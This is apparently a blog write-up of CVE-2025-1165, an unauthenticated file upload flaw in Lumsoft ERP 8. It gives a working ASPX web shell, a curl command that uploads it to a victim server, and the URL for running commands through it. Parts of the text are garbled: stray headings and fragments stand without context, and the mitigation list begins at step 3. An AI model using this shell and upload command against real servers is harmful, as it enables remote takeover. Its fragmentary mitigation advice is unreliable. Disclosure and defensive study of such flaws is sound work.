CVE-2025-1165 - Critical Unrestricted File Upload in Lumsoft ERP 8 Explained with Exploit Details

In early 2025, a severe security flaw—CVE-2025-1165—was discovered and disclosed in the well-known ERP software, Lumsoft ERP 8. This vulnerability exposes systems to full compromise by allowing anyone to upload arbitrary files via a web endpoint, with only basic HTTP access required.

Below, we break down what happened, show clear exploit code, and help you understand why you need to patch urgently.

What Is CVE-2025-1165?

CVE-2025-1165 is a critical vulnerability in Lumsoft ERP 8, specifically found in the DoUpload/DoWebUpload functionality of the file /Api/FileUploadApi.ashx. By manipulating the file argument in a POST request, an attacker can upload files without restriction—including potentially malicious executables or web shells.

Attackers do not need to be logged in. Anyone who knows the vulnerable endpoint can exploit it.

Technical Details

The vulnerable handler is at /Api/FileUploadApi.ashx. The functions DoUpload and DoWebUpload fail to properly validate or restrict the file types and paths that a user can upload.

Simplified vulnerable code (decompiled)

public void DoUpload(HttpContext context) {
    HttpPostedFile file = context.Request.Files["file"];
    string path = context.Server.MapPath("~/UploadedFiles/" + file.FileName);
    file.SaveAs(path);
}

File extension (.aspx, .php, .exe)

- Path traversal (e.g., ../../)

Authentication

This means an attacker can upload any file—including executable code for the server’s platform.

Example web shell (Tiny.aspx)

<%@ Page Language="C#" %>
<% if (Request["cmd"] != null) { 
    System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["cmd"]);
} %>

Exploit command using curl

curl -F "file=@Tiny.aspx" \
  http://[victim-server]/Api/FileUploadApi.ashx?method=DoWebUpload

After upload, the attacker can access the shell at

http://[victim-server]/UploadedFiles/Tiny.aspx?cmd=whoami

This gives them instant remote command execution as the server’s user.

References and Public Disclosures

- NVD (CVE-2025-1165 entry)
- Exploit DB page for CVE-2025-1165
- GitHub PoC and writeup (public)

Lumsoft’s advisory and patch: (link when available—check vendor page)

Block access: Restrict exposure to this endpoint using firewalls or web server configuration.

3. Remove uploaded shells: Scan the /UploadedFiles/ or wherever user files are stored.

Conclusion

CVE-2025-1165 in Lumsoft ERP 8 is a classic, yet devastating example of failing to properly secure file upload endpoints. The public exploit code makes mass exploitation inevitable.

If you use Lumsoft ERP 8, update and secure your systems now. Don’t wait until intruders take advantage.

Timeline

Published on: 02/11/2025 01:15:09 UTC
Last modified on: 02/18/2025 18:15:30 UTC